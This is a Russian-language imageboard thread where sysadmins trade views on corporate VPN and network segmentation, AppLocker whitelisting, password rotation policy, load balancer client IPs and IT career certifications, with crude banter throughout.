Вариант же, где по впн мы попадаем внутрь всей сети и имеет доступ ко всему на свете, выше уже писал чем может закончиться - найдут пользователя с плохим паролем (в большой конторе это не сложно), найдут впн сервер (его тоже особо то и не спрячешь) и всё пикрелейтид...

>>1161075
Вариант с отдельным впном и дмз для каждого сервиса уебищен, т.к. если внутренних ресурсов много, то у разъездных сотрудников будет несколько десятков ярлычков разных впнов с... РАЗНЫМИ паролями и точками входя, иначе это всё, очевидно, теряет всякий смысл. Хуже того, если есть локалка, откуда у пользователей есть доступ ко всем сервисам сразу, то стоит кому-то схватить бекдор или поставить тимвьювер, как все титанические усилия по защите внешнего периметра идут коту под хвост.

В подобных случаях делают несколько зон с разной степенью секретности, при том доступ к ним ограничивают и из локальной сети тоже. Ну или если деньги позволяют, то покупают нормальное решение уровня того же anyconnect (впрочем, это уже давно не самое лучшее решение), где можно делать группы пользователей и вешать на них профили с разными сплит туннелями, т.е. сегментировать доступ к сети. Дальше остается только каждый сервис в свою подсеть загнать, запретить им видеть друг друга на прямую и разобраться каким группам пользаков что можно, а что нельзя.

В таком варианте у пользователя всегда работает эниконнект и в локалке, и во внешних сетях, просто используются немного разные профили, а логин и пароль всегда один и тот же. Впрочем, и выбор профилей, и ввод логина/пароля могут быть автоматизированы и пользователь даже не будет толком знать как функционирует сеть на его рабочем ноуте, при этом у него могут быть локальные админские права, что превращает ноут из корпоративной гантели таки в компьютер.
Аноним 10/01/18 Срд 11:22:57 #503 №1161089 
>>1161086
Дурик, впн не до сотрудника а для рутера, а с рутера маршрут куда надо дальше
Например, если у тебя серверная часть разбита на две, лайк ексчейндж, то хороший вариант такой:
почтовый сервер < VPN > | <VPN> сервер для подключения, OWA и тп | реверсивный прокси
Аноним 10/01/18 Срд 11:23:43 #504 №1161090 
>>1161086
https://habrahabr.ru/post/302068/
Тут хорошо описано
Аноним 10/01/18 Срд 11:24:17 #505 №1161091 
Коллеги, возникла необходимость через AppLocker создать на терминальном сервере белый список приложений доступных для использования, но есть желание использовать его не так, что пользователю доступны для запуска все приложения из папки Windows и PrFiles, а только обозначенный список.
Кто знает где можно посмотреть список приложений из этих папок необходимых для работы сессии юзверя (понимаю что он наверное будет достаточно большой, но на волне вскрытия покровов всяких этих новых уязвимостей начальство начало параноить)? Гуглить пытался и так и эдак, ни в какую, готовых пресетов для AppLocker'a тоже не нашел с таким уклоном.
Аноним 10/01/18 Срд 11:32:42 #506 №1161092 
>>1161089
Речь изначально шла о доступе произвольных сотрудников к произвольным внутренним ресурсам из внешних сетей. Пример с эксченджом нерелевантный, т.к. во-первых, не всякая его версия делится на фронт- бек-энд, во-вторых, там где такое деление заложено архитектурно и проблем никаких не возникает, в третьих, почтовый сервер всё равно всегда доступен из вне, т.е. сотрудникам не нужно ничего дополнительно предпринимать, чтобы им пользоваться откуда угодно.
Аноним 10/01/18 Срд 11:34:07 #507 №1161094 
>>1161091
Могу предложить только через ГПО
http://vynesimozg.com/razreshit-zapusk-tolko-opredelennyx-programm-v-windows/

Хотя решение так себе
Аноним 10/01/18 Срд 11:37:45 #508 №1161095 
>>1161094
Через ГПО рассматривал как вариант, но нигде не нашел принцип работы, если у апплокера четко написано что проверяет по хэшу, то ГПО не описано по хэшу или это просто хуета, у которой можно будет в изи подменить сам исполняемый файл.
Аноним 10/01/18 Срд 11:39:10 #509 №1161096 
>>1161092
>шла о доступе произвольных сотрудников к произвольным внутренним ресурсам из внешних сетей
Ну, я думал, что мы уже согласились на ВПН, так как остальные варианты не являются безопасными
Ексчейндж - разговор про правильный ДМЗ, а не просто создал отдельную подсеть и туда напихал
Аноним 10/01/18 Срд 11:40:48 #510 №1161097 
>>1161095
>подменить сам исполняемый файл.
Да, так и есть, но ты можешь использовать оба решения разом:
1. Аплокер не даст доступ никуда кроме програмфайлс, а туда может писать файлы только администратор
2. А ГПО залочить файлы по именам, опять же переименовать файл в програмфайлс, насколько я помню, простой юзер не может
или как-то так
Аноним 10/01/18 Срд 11:42:12 #511 №1161098 
>>1161097
Спасибо за ответы, потестирую такую связку.
Аноним 10/01/18 Срд 11:55:25 #512 №1161103 
>>1161086
>найдут пользователя с плохим паролем
Паролем от впн? Так там сертификаты, которые поверх ещё с паролем. Их по моему не просто перебрать.
Аноним 10/01/18 Срд 11:58:27 #513 №1161109 
>>1161103
У многих доступ тупо по доменному логину и паролю. Сертификаты нихуя не работают, если компания не может осилить выдачу корпоративных ноутов всем сотрудникам, работающим удаленном, но не способным самостоятельно поставить сертификат на свой домашний комп, а такие - все пользователи, лол.
Аноним 10/01/18 Срд 12:06:17 #514 №1161114 
>>1161109
Я сейчас говорю не об виндовых решениях, а например о openvpn.

Как делаю я - у меня опенвпн, на котором сделана подсеть для клиентов своя, и стоит запрет ходить куда-то ещё. Когда человеку нужен доступ до внутреннего ресурса, я добавляю правило в фаерволе на именно этот ресурс именно на этого человека, и добавляю ему маршрут в локалку. Сертификаты выпускаю на отдельной машине, когда нужно оформить доступ удалённому пользователю - засовываю сертификат в 7з архив с шифрованием АЕС и километровым паролем, посылаю почтой архив, по телефону отдельно голосом говорю пароль. Какие в таком подходе проблемы?
Аноним 10/01/18 Срд 12:11:12 #515 №1161115 
>>1161114
>Какие в таком подходе проблемы?
Ну представь, у меня в компании 3000+ пользователей, из них у трети есть внп доступ. Еще у нас десятки внутренних серверов на которые пользователи хотят ходить. Часть этих внутренних ресурсов - фермы с брокером, т.к. ты обращаешься всегда к брокеру, а он пробрасывает тебя на члена фермы, члены фермы каждый имеет свой адрес и могут появляться и исчезать с течением времени. 99% пользователей не способно не то, что сертификат установить или опенвпн клиент себе поставить, а даже архив распаковать не смогут (особенно 7z - это не самый популярный формат среди офисных хомячков).

Теперь прикинь, СКОЛЬКО, у тебя будет работы при твоем то подходе...
Аноним 10/01/18 Срд 12:17:48 #516 №1161117 
>>1161115
А, ну да, масштабы. У меня не больше сотни клиентов по впн, а сотрудников около тысячи. Единственное что я не автоматизировал в этом алгоритме - передача архива с паролем, остальное скриптами делаю.

Так-то да, согласен, при больших масштабах работы много. Но в остальном по моему ок.
Аноним 10/01/18 Срд 12:27:13 #517 №1161118 
>>1161103
>>1161109
Про сертификат анон прав, даже в моём 6к сотрудников продакшене ВПН на циске по паролю от АД

Есть вариант - сложные пароли, и ещё один, который у себя пока не внедрял, но друг делал:
https://habrahabr.ru/post/310604/
На основании подобного костыля он пинал юзеров на смену "сложных" паролей соответствующих политике на действительно сложные пароли

>>1161117
> при больших масштабах работы много
Так лучший показатель качества - масштабируемость

Аноним 10/01/18 Срд 12:27:37 #518 №1161119 
>>1161097
>1. Аплокер не даст доступ никуда кроме програмфайлс, а туда может писать файлы только администратор

Схуев? Можешь настраивать правила для путей как хочешь, всё зависит от тебя.

>>1161097
>2. А ГПО залочить файлы по именам, опять же переименовать файл в програмфайлс, насколько я помню, простой юзер не может
>или как-то так

>>1161091
>Коллеги, возникла необходимость через AppLocker создать на терминальном сервере белый список приложений доступных для использования, но есть желание использовать его не так, что пользователю доступны для запуска все приложения из папки Windows и PrFiles, а только обозначенный список.
>Кто знает где можно посмотреть список приложений из этих папок необходимых для работы сессии юзверя (понимаю что он наверное будет достаточно большой, но на волне вскрытия покровов всяких этих новых уязвимостей начальство начало параноить)? Гуглить пытался и так и эдак, ни в какую, готовых пресетов для AppLocker'a тоже не нашел с таким уклоном.

Через ГПО распространяешь политику Апплокера. В самом апплокере настраиваешь как душе угодно. Хоть по хэшу, хоть по сертификатам, хоть по путям.
Аноним 10/01/18 Срд 13:08:50 #519 №1161134 
>>1161118
>ВПН на циске по паролю от АД
Единственный вариант перейти к сертификатам - выдавать сотрудникам преднастроенные ноуты. Приличные компании, беспокоящиеся о безопасности так и делают. Тем более, что выдавать ноуты выгоднее, чем оборудовать рабочие места компами. Но тут зрелость бизнеса нужна, т.к. многие боятся, что ноуты разворуют, что на них будут не работать, а развлекаться, что их сломают, постоянно таская домой, что не будут появляться в офисе, оправдываясь "из дома поработаю", что так дороже выйдет. И развеять все эти заблуждения невозможно - бизнес сам должен понять, что стационарные компьютеры давно устарели и по сути своей уже давно никому не нужны, кроме геймеров да дизайнеров.

>сложные пароли
Этот вариант вообще не работает. Особенно сильно он не работает в сочетании с необходимости регулярной смены пароля. Умные люди, кстати, давно уже пришли к выводу, что сложный пароль помнить нужно всего один, а менять его только при подозрении, что он был скомпрометирован, отслеживанием чего и должна заниматься служба безопасности. Подробнее тут: https://habrahabr.ru/company/everydaytools/blog/334600/
Аноним 10/01/18 Срд 13:14:46 #520 №1161137 
>>1161134
>Этот вариант вообще не работает
Опомнись, у тебя по PCI DSS или ISO 27000 должна быть постоянная смена паролей пользователей

По поводу устройств - тут часть фирмы, но есть и личные, когда сотрудник (директор филиала) сам начинает требовать, чтобы он работал на личном маке

В любом случае авторизации по сертификату нету
Аноним 10/01/18 Срд 13:21:21 #521 №1161139 
>>1161137
>PCI DSS или ISO 27000
Ну тогда смирись, что у всех пользователей всегда будут пароли вида:
pA$Cf0Rd1_
pA$Cf0Rd_2
pA$Cf0Rd3_
pA$Cf0Rd4_
pA$Cf0Rd_5
Которые, кстати, хорошо брутаются, подробнее тут: https://habrahabr.ru/company/everydaytools/blog/323864/
Аноним 10/01/18 Срд 13:22:35 #522 №1161142 
>>1161134
>Единственный вариант перейти к сертификатам - выдавать сотрудникам преднастроенные ноуты. Приличные компании, беспокоящиеся о безопасности так и делают. Тем более, что выдавать ноуты выгоднее, чем оборудовать рабочие места компами. Но тут зрелость бизнеса нужна, т.к. многие боятся, что ноуты разворуют, что на них будут не работать, а развлекаться, что их сломают, постоянно таская домой, что не будут появляться в офисе, оправдываясь "из дома поработаю", что так дороже выйдет. И развеять все эти заблуждения невозможно - бизнес сам должен понять, что стационарные компьютеры давно устарели и по сути своей уже давно никому не нужны, кроме геймеров да дизайнеров.

Если фирма большая, то можно заморочиться и поднять портал на котором пользователи будут сами себе генерировать сертификаты.
Аноним 10/01/18 Срд 13:23:56 #523 №1161143 
>>1161142
Лишний геморрой, который мало кто осилит.
Аноним 10/01/18 Срд 13:26:38 #524 №1161145 
>>1161139
Что ты сейчас вообще несёшь, суть в том, что бы убрать топ 1000 хешей паролей

Почитай как подбирают пароли, это делается по радужной карте, так всё сводится к тому, чтобы твои хеши туда не попадали.

В любом случае с выходом на стандарт ИБ тебе всё равно придётся это внедрять
Аноним 10/01/18 Срд 13:28:29 #525 №1161146 
>>1161142
> то можно заморочиться и поднять портал на котором пользователи будут сами себе генерировать сертификаты
Это так не работает
1 - это не секурно
2 - юзеры это не будут делать, это не их проблема и задача
3 - головная боль для эникеев
Аноним 10/01/18 Срд 13:30:24 #526 №1161149 
>>1161143
>Лишний геморрой, который мало кто осилит.

У нас так для почты сделано. На мобильные устройства, либо на ноутбуки пользователи генерируют себе серт и ходят в ОВУ как молодцы.

>>1161146
>Это так не работает
>1 - это не секурно
>2 - юзеры это не будут делать, это не их проблема и задача
>3 - головная боль для эникеев

1) Смотря для чего использовать и как реализовать
2) Если энтерпрайз, то будут, им деваться некуда
3) Такова жизнь эникея.
Аноним 10/01/18 Срд 13:33:25 #527 №1161151 
>>1161145
После пары смены паролей - всё вернется на круги своя. Ну или тебе нужно постоянно брутить радужными пароли собственных пользователей и после постоянно пиздить пользаков за нарушения. Упрешься ты в то, что какой-нибудь топ-менеджер в итоге пошлет пошлет тебя нахуй... ну или бабки из бухгалтерии устроят бунт, в котором топы обвинят, конечно, тебя. Всех, кто пытается плыть против течения - смоет. Рано или поздно.

>>1161149
>им деваться некуда
Ага, до первой проблемы у какой-нибудь важной шишки, после чего все подобные штуки навсегда закрываются, либо часть избранных сотрудников, начинает работать в обход них. Не нужно усложнять. Максимум что можно сделать - двухфакторную авторизацию по смс для сотрудников, входящих в сеть удаленно. И то это херовая идея, если, например, я уехал в Тай на месяц и оставил российскую симку дома за ненадобностью, а потом оказалось, что без меня бизнес нихуя не может, т.к. мой коллега заболел/умер.
Аноним 10/01/18 Срд 13:34:33 #528 №1161153 
>>1161151
>Ага, до первой проблемы у какой-нибудь важной шишки, после чего все подобные штуки навсегда закрываются, либо часть избранных сотрудников, начинает работать в обход них. Не нужно усложнять. Максимум что можно сделать - двухфакторную авторизацию по смс для сотрудников, входящих в сеть удаленно. И то это херовая идея, если, например, я уехал в Тай на месяц и оставил российскую симку дома за ненадобностью, а потом оказалось, что без меня бизнес нихуя не может, т.к. мой коллега заболел/умер.

Я же написал, энтерпрайз. У нас всё как часы и с большими шишками тоже.
Аноним 10/01/18 Срд 13:42:44 #529 №1161156 
>>1161151
>После пары смены паролей
Ты вообще не читаешь, что тебе пишут, подобный костыль был внедрён после проведения аудита PCI DSS, когда у пользователя оказался пароль Andrey1, он отвечал всем требованием сложных паролей, но стандартизацию мой друг не мог пройти до устранения подобных паролей, от чего и был придуман костыль по удалению самых популярных паролей
Иди фантазируй дальше. Даже в моей конторе с 6к пользователями без стандартизации есть сложные пароли с сроком 42 дня, все сидят с такими паролями и не пукают
Аноним 10/01/18 Срд 14:26:09 #530 №1161184 
>>1161156
Ты реально на 100% уверен, что у вас не осталось херовых паролей? То, что ты прошел аудит и получил сертификат вчера, вовсе не значит, что пройдешь его сегодня! Потому что у вас пароли сложные и регулярно меняются, а изменить поведение и привычки людей невозможно...

>>1161153
Не верю. Скорее всего, ты просто не знаешь о той хуйне что где-нибудь сбоку от тебя творится. А хуйня, она, точно есть.
Аноним 10/01/18 Срд 14:36:35 #531 №1161190 
>>1161184
>Не верю. Скорее всего, ты просто не знаешь о той хуйне что где-нибудь сбоку от тебя творится. А хуйня, она, точно есть.

Конечно хуйня творится на уровне эникеев. Но их жизнь создана для боли. Но больший процент сотрудников научился подключать почту сам.

Про ВПН отдельная боль, т.к он у нас программно-аппаратный.
Аноним 10/01/18 Срд 14:52:04 #532 №1161195 
>>1161184
Расслабься уже, аудит проводится раз в какое-то время, если нужно подтверждения стандартам ИБ, и не у меня, а у друга
Ну не хочешь ты сложных паролей, так не делай, кто тебе запрещает
Аноним 10/01/18 Срд 14:52:57 #533 №1161196 
>>1161190
>Про ВПН отдельная боль, т.к он у нас программно-аппаратный.
циска с с-террой что ли? или что у тебя там не так?
Аноним 10/01/18 Срд 14:53:59 #534 №1161197 
>>1161115
>особенно 7z - это не самый популярный формат среди офисных хомячков
Для меня загадка как эти люди получают работу и что они пишут в резюме. Резюме бухгалтера еще могу себе представить, но что пишут какие-нибудь эффективные менеджеры по работе с клиентами или продаваны? "Сидел и продавал"? "Эффективно общался с клиентами"? "Ворд, Эксель, 1С, интернет"?
Аноним 10/01/18 Срд 15:08:36 #535 №1161205 
>>1161197
Они и не пишут, устраиваются по знакомству все как один. Резюме и собеседования для ребят попроще.
Аноним 10/01/18 Срд 15:31:50 #536 №1161219 
>>1161196
>циска с с-террой что ли? или что у тебя там не так?

Циска с с-террой разве получили сертификат соответствия в нашей стране и в разрешенном списке у регулятора? Нет, увы.
Аноним 10/01/18 Срд 15:46:57 #537 №1161223 
Коллеги, слушайте, столкнулся с проблемой балансировки нагрузки. Тестирование показало, что балансировщик подставляет свой ip-адрес в запрос к серверу и обратно, вместо реального адреса клиента. При этом пропадает возможность определения клиента от которого исходит запрос. Возможно как-то обеспечить обратную маршрутизацию, т.к когда адрес клиента будет пробрасываться сквозь балансировщик?
Аноним 10/01/18 Срд 15:51:20 #538 №1161228 
>>1161197
>эффективные менеджеры по работе с клиентами или продаваны
Что-то типа:
- Увеличение продаж на вверенном регионе на 25 процентов за квартал.
- Работа с возражениями потенциальных клиентов, увеличение базы данных клиентов на 10 процентов за месяц.
- Призер по продажам конкурса "Лучший продавец ООО Рога копыта"


что тут непонятного?
Аноним 10/01/18 Срд 15:52:43 #539 №1161229 
>>1161223
У nginx можно вместе с адресом балансировщика записывать реальный ip. Можно напердолить сканирование логов nginx и дальше использовать адрес клиента где надо.

Вроде Nginx Application Platform позволяет сразу питоновский код выполнять, я правда вообще рпо это ничего не знаю. Но в теории наверное можно решить эту проблему чисто средствами nginx
Аноним 10/01/18 Срд 15:54:22 #540 №1161231 
<anclbob> как заблокировать диапазон 192.168.0.0-192.168.254.254 на freeBSD?
<anclbob> я сделал файл в 65 тыс строк вот таких:
ifconfig_fxp0_alias0="inet 192.168.0.0 netmask 255.255.255.255"
.....
ifconfig_fxp0_alias65434="inet 192.168.254.254 netmask 255.255.255.255"
<anclbob> занёс в rc.conf, но фря загружалась минут 20 и дошла только до 192 подсети.
<anclbob> Как решить такую проблему что бы нежелательные пользователи не могли попасть в сеть никак?
Аноним 10/01/18 Срд 15:56:46 #541 №1161233 
>>1161219
>в разрешенном списке у регулятора
С-терра - да, конечно, это российская компания, выпускает модули ВПН для цисок, "с целью скрыться от сертификатов злых пендосов в ипсек", а на деле, просто, чтобы смотреть банковский трафик
Аноним 10/01/18 Срд 15:57:01 #542 №1161234 
>>1161231
Рискну предположить что нужна маска /16
Аноним 10/01/18 Срд 16:10:04 #543 №1161238 
>>1161233
>С-терра - да, конечно, это российская компания, выпускает модули ВПН для цисок, "с целью скрыться от сертификатов злых пендосов в ипсек", а на деле, просто, чтобы смотреть банковский трафик

Понятно, спасибо, не знал. У нас другое зло - Амикон.
Аноним 10/01/18 Срд 16:13:39 #544 №1161242 
>>1161229
>У nginx можно вместе с адресом балансировщика записывать реальный ip. Можно напердолить сканирование логов nginx и дальше использовать адрес клиента где надо.
>
>Вроде Nginx Application Platform позволяет сразу питоновский код выполнять, я правда вообще рпо это ничего не знаю. Но в теории наверное можно решить эту проблему чисто средствами nginx

Поднимать nginx под такое не будут, у нас купленный SCCM, который такое не умеет вроде как. Ну либо надо будет непосредственно в пакеты вносить изменения.

Аппаратные решения тоже подойдут, если есть NLB с такими фичами.
Аноним 10/01/18 Срд 16:18:46 #545 №1161247 
>>1161223
Тоже самое, у нас стоит х-прокси реверсом на почту, на х-прокси видны внешние ИП, а дальше на почту приходят запросы с самого ревирса, но нас это устраивает
У тебя какая цель?
Аноним 10/01/18 Срд 16:20:32 #546 №1161251 
Сап сасач. Итт сыч 25 лвл. Хочу работу, связанную с ойти. Много раз пытался в погромирование с 16 до 23 лет, но СДВГ не считает, что мне это нужно, забил уже.

Вообще я уже года два чекаю вакансии курьера на хедхантере, но по моему округу, в <часе пути, нормальных вакансий вообще нихуя нет, и это сраный ДС. Только на развоз еды, но это супер дно, не хотет.


В общем к сути. Я знаю что тут сейчас все дохуя самоучки мне напишут что я долбоеб, но может найдется кто адекватный с нормальным ответом. Насколько котируются курсы сис.админов? Мне нужно чтобы меня всему научили за n часов, выдали бумажку и можно было сразу искать работу, надоело сычевать и жрать мамкины коклеты и пельмени. Может посоветуете контору нормальную, или просто пару советов дадите, заранее благодарю.
Открыл, перед тем как это написать, первый результат в гугле, там типа за 60 академичиских часов за полтора месяца дают основу с практикой, за 12к рупий. Пока что планирую подыскать подобное, но поближе к дому, а не в полутора часах езды в один конец.
Аноним 10/01/18 Срд 16:32:17 #547 №1161258 
>>1161247
>Тоже самое, у нас стоит х-прокси реверсом на почту, на х-прокси видны внешние ИП, а дальше на почту приходят запросы с самого ревирса, но нас это устраивает
>У тебя какая цель?

Это балансировщик LDAP. Учетная запись сотрудника лочится, но источником выступает балансировщик, из-за чего найти реальный источник невозможно. Тоже самое в DNS. Системы устраивают ДДОС, но конкретных клиентом не видно.
Аноним 10/01/18 Срд 16:34:06 #548 №1161260 
>>1161251
>Мне нужно чтобы меня всему научили за n часов, выдали бумажку и можно было сразу искать работу, надоело сычевать и жрать мамкины коклеты и пельмени. Может посоветуете контору нормальную, или просто пару советов дадите, заранее благодарю.

Смотри переквалификацию.
Аноним 10/01/18 Срд 16:51:54 #549 №1161275 
>>1161251
Такие "курсы" - развод и лохотрон. Выбери интересующие тебя продукты/железки, найди на торрентах программу обучения составленную вендором и готовься по ней - вся информация есть интернете в почти открытом виде. Потом, если средства позволяют, можешь сдать официальный вендорский экзамен. Получишь ачивку - сертификат. Его можно будет вписать в резюме и работодатель увидит, что ты не полный долбоеб и из лужи не пьешь. Можно будет вкатиться на нормальную работу и начать набивать экспу.
Аноним 10/01/18 Срд 17:41:29 #550 №1161315 
>>1161251
Чего умеешь то, чего хочешь? Сколько денег есть на обучения/сертификации. А то и айти большое и курсы есть по 2к зелени в неделю...
Аноним 10/01/18 Срд 17:54:07 #551 №1161328 
>>1161315
> Чего умеешь то, чего хочешь?
Ну, некоторые базовые знания есть. Пару лет назад ещё бубунты всякие с минтом ставил на свой ноут. Арч правда так и не смог поставить, мб из-за железа ебанутого.

> Сколько денег есть на обучения/сертификации
Тот первый результат в гугле стоил около 12к за все 60 академ.часов. Хотелось бы не больше тридцатки тащемта.
Аноним 10/01/18 Срд 17:54:42 #552 №1161331 
К вопросу о стойких паролях. Неплохой вариант же випнетовский генератор бреда. Он, правда, как-то пропал из публичного доступа, но подобную "глокую куздру" и самому накарябать можно.
А ещё к аналогичному вопросу в прошлых тредах кто-то писал, что пароли генерирует начальник - бывший вояка. Он, значить, ходить и матькается, а анон за ним записывает.
Главное, чтоб запоминалось. Наркоманские фразочки випнета и витиеватый отборный мат - таки запоминаются. Для совсем дебилов либо биометрия, либо увольнение слишком инициативного анона.
Аноним 11/01/18 Чтв 09:25:22 #553 №1161699 
>>1161331
>Главное, чтоб запоминалось. Наркоманские фразочки випнета
Xo4yHaPy4ki!
такой?
Аноним 11/01/18 Чтв 09:42:55 #554 №1161705 
>>1161699
Скорее что-то вроде "расистский моллюск гарцует на гениталиях".
Аноним 11/01/18 Чтв 09:45:06 #555 №1161706 
>>1161705
Так есть ограничение на пароли в той же АД по длине
это на всякие трукрипты я люблю ставить 20+ символов, а на шинду-то как поставить
Аноним 11/01/18 Чтв 09:46:54 #556 №1161707 
>>1161331
Надеюсь, в ближайшие годы уже полностью перейдут на фейсайди и дактилоскопию. Встроить камеру в монитор, или сканер отпечатков пальцев в мышь/клавиатуру - такое уже есть. Вопрос за софтом и за внедрением решений в бизнес-секторе.

>>1161328
Вангую, ты не смог поставить загрузчик в арче, т.к. не разобрался, что для EFI нужен GTP диск, а для BIOS -
MBR. Ну и аргументы у команды установки загрузчика, соответственно, будут немного отличаться.

>базовые знания есть
Если ты хочешь по части линуксов развиваться, то без опыта и образования логично задуматься о RHCSA EX-200 и RHCE EX-300 - в зависимости от твоего опыта. По цене сертификат обойдется в 16-18к рублей где-то. На многие начальные позиции после этого тебя будут охотно брать и с учетом уровня ЗП, твои вложения окупятся в первые же недели на работе.
Аноним 11/01/18 Чтв 09:48:06 #557 №1161708 
>>1161706
>ограничение на пароли в той же АД по длине
Там от каждого слова берутся первые три (или сколько получится) буквы.
>>1161705
>"расистский моллюск гарцует на гениталиях"
И конец этих слов
АЛЬМСИВИ

Аноним 11/01/18 Чтв 10:00:37 #558 №1161717 
1426771684316105393.png
>>1161708
>АЛЬМСИВИ
Ты, щенок, забыл на кого молиться? Сейчас я выбью из тебя это данмерское дерьмо
Аноним 11/01/18 Чтв 11:09:45 #559 №1161734 
Скажите, нужно ли обновлять Rommon на Cisco?
Аноним 11/01/18 Чтв 13:29:41 #560 №1161777 
>>1161734
>Скажите, нужно ли обновлять Rommon на Cisco?
это вообще можно сделать?
Я ни разу не обновлял. IOS/NS-OS только.
Аноним 11/01/18 Чтв 13:41:13 #561 №1161779 
>>1161777
По идее эта херня отвечает за совместимость аппаратной и программной части, cisco.com вообще никакой инфы не дает на этот счет.
Собираюсь загнать 6500 в VSS, в инструкциях предлагают обновить ROMMON на SUP плате, но тоже без объяснения, блеать.
Аноним 11/01/18 Чтв 14:26:05 #562 №1161802 
Какого хера некоторые сайты МТС блокирует даже не взирая на то, что у меня стоит Frigate и ДНС гугла?
Как они его блокируют?
Аноним 11/01/18 Чтв 14:30:05 #563 №1161805 
>>1161802
У меня тоже мтс + фаеровол безопасников - пока с таким не сталкивался, дай что-ли пример сайта...

>>1161734
Ну я на 1841 у себя дома обновил. Зачем? Хуй знает.
Аноним 11/01/18 Чтв 14:30:58 #564 №1161806 
>>1161802
>Как они его блокируют?
Я могу тебе немного подсказать, но я боюсь, что меня посодят
ссылка только в ознакомительных целях, по твоему вопросу гугли "обход DPI"
pympekep .com/foru m/viewto pic.ph p?t=5126 394
И обход блокировок незаконен, ты должен сидеть на бутылке, как и я
Аноним 11/01/18 Чтв 14:31:09 #565 №1161807 
>>1161805
> мтс + фаеровол безопасников - пока с т
да хоть бы linkedin.com
ещё биржа bitfinex.com
Аноним 11/01/18 Чтв 14:32:34 #566 №1161808 
>>1161805
>1841
У меня была такая, я её другу подарил, наверное надо было себе оставить
>>1161802
>>1161805
А да, и почисть кешДНС и открой в вкладке инкогнито
Аноним 11/01/18 Чтв 14:33:42 #567 №1161810 
>>1161807
>bitfinex.com
МТС на работе - всё открывается
linkedin.com - нет
Аноним 11/01/18 Чтв 14:34:18 #568 №1161811 
>>1161810
МГТС у меня дома. Не открывается.
Аноним 11/01/18 Чтв 15:45:28 #569 №1161843 
https://habrahabr.ru/post/335436/
Аноним 12/01/18 Птн 14:29:37 #570 №1162205 
2.png
У меня тут дилемма. Ставить домен, или ну его в задницу?

Есть локалка на 20 юзеров без домена.
Нужно воздвигнуть 1С SQL сервер. При попытке поставить MS SQL, он требует от меня данные для входа polybase engine. И не принимает ни локальные учётки, ни системные. Говорит, давай домен. Вот я и думаю, может плюнуть, засучить рукава, и таки сделать домен? Поднять ещё одну виртуалку, поставить домен, ввести сервер 1С в домен и после завершения работ с 1С потихоньку переводить в домен все остальные серверы и юзеров. Но это лишняя работа, плюс у многих тут винда версии хоум. Получится много геморроя и сеть надолго станет одной ногой в рабочей группе, а другой в домене.
Аноним 12/01/18 Птн 14:40:41 #571 №1162211 
>>1162205
>локалка на 20 юзеров
ну хууууууй знает, хотя домен, конечно, добро, но на 20 юзеров, ну крепко хуй знает
С другой стороны ты хочешь использовать PolyBase, который должен откуда-то брать данные, не?
Аноним 12/01/18 Птн 15:04:17 #572 №1162220 
>>1162205
> Параллельное хранилище данных PolyBase — это технология, которая обращается к данным за пределами базы данных с помощью языка t-sql. В SQL Server 2016 она позволяет выполнять запросы к внешним данным в хранилище BLOB-объектов Azure или Hadoop, а также импортировать данные в такое хранилище и экспортировать их из него.
Ответ очевиден - тебе не нужен PolyBase Engine, не ставь его.
Аноним 12/01/18 Птн 15:23:21 #573 №1162229 
>>1162211
>С другой стороны ты хочешь использовать PolyBase
Так уплочено же! Лицензионный Microsoft SQL Server 2016 Standard честно куплен. Правда, Runtime, а не Full, но всё равно.
>>1162220
Эх. Это как заплатить проститутке за секс с любыми извращениями, а потом взять и обойтись ез копро. То есть, вроде и не хотелось, но жаба душит.
Аноним 12/01/18 Птн 16:06:37 #574 №1162256 
>>1162229
Если не будешь юзать, то не надо ставить, нахуй ты себя мучаешь, 20 человек без домена себя отлично чувствуют
Хотя, просто можешь сделать - потренироваться
Аноним 13/01/18 Суб 16:42:42 #575 №1162564 
eaK5qRZYYr8.jpg
Возьмут ли меня на работу без вышки и без сертификатов?
Знания и опыт имеются.
Аноним 13/01/18 Суб 17:37:56 #576 №1162582 
Как же меня ебут. Каждый день встреваю в инцидент на проде, ну просто пиздец, чую и месяца не проработаю в этой конторе.
Аноним 13/01/18 Суб 19:16:58 #577 №1162620 
>>1162582
Инциденты из-за тебя случаются?
Аноним 13/01/18 Суб 20:24:43 #578 №1162651 
>>1162620
Нет, но пока я не могу их оперативно решать. Туплю.
Аноним 14/01/18 Вск 13:40:36 #579 №1162871 
>>1156737
Прекратите ебать труп
Аноним 14/01/18 Вск 14:11:26 #580 №1162884 
>>1162651
Шли борзых погонщиков нахуй. Работодатель имеет с тебя в несколько раз больше бабок, чем платит тебе. Главное, не развивай у себя чувство вины.
Аноним 14/01/18 Вск 14:13:09 #581 №1162885 
>>1161251
Попробуй вкатиться эникеем. Хоть куда-нибудь точно возьмут.
Аноним 14/01/18 Вск 17:20:49 #582 №1162983 
>>1149761 (OP)
Вы же понимаете что вашу работу может выполнять не сильно развитая нейросетка? И что в топовых компаниях админов уже выкинули на мороз, и вся работа по расширению и поддержке работоспособности выполняется именно так?

В будущие пять лет ваша профессия полностью вымрет, останутся только такие полуразрабы-внедренцы нейросетей.
Аноним 14/01/18 Вск 17:26:09 #583 №1162986 
>>1162983
да-да, а всех программистов заменит AI, мы в курсе
Аноним 14/01/18 Вск 17:27:44 #584 №1162987 
>>1162986
До полноценного ИИ ещё очень долго, и он заменит натурально всех. А вот нейросети уже сейчас админов заменяют.

Я бы на вашем месте перекатывался уже сейчас, пока компании крупные не просекли тренд. В теории, из админа может получиться что-то вроде программиста, при должных усилиях.
Аноним 14/01/18 Вск 17:29:49 #585 №1162989 
>>1162987
>нейросети уже сейчас админов заменяют
Это интересно как? Конечно некоторая автоматизация присутствует, всякие ансиблы и докеры позволяют в одиночку управлять сотнями, если не тысячами машин.
Вот только конфиги и сценарии таки не нейросети пишут
Аноним 14/01/18 Вск 18:43:19 #586 №1163004 
>>1162989
Не отвечай ему, тролль должен сдохнуть с голоду. И перестать писать одно и то же.
Аноним 14/01/18 Вск 20:04:18 #587 №1163036 
Привет котаны. Есть два стула - ccna и далее / mcsa и далее.
Сам пока хуй простой но знания некоторые по обоим областям есть.
Чего хочу получить - хочу перекатиться в ДЦ через полгода-год (а тут надо от 60к зп иметь) и с перспективой съёба в гейропу или асашай.
На какой стул садиться?
Аноним 15/01/18 Пнд 04:37:04 #588 №1163145 
>>1162885
> Хоть куда-нибудь точно возьмут.
Это "хоть куда-нибудь" скорее всего означает какую-нибудь говноконтору на другом конце города. Тратить по полтора часа на путь до работы и потом обратно столько же, и всё это за 25к...
Аноним 15/01/18 Пнд 08:24:50 #589 №1163160 
>>1162987
>В теории, из админа может получиться что-то вроде программиста
